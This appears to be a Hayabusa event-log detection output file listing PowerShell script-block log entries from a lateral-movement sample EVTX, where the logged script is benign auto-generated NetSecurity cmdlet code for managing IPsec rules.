[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'En",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] 
${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'En",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,abled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = 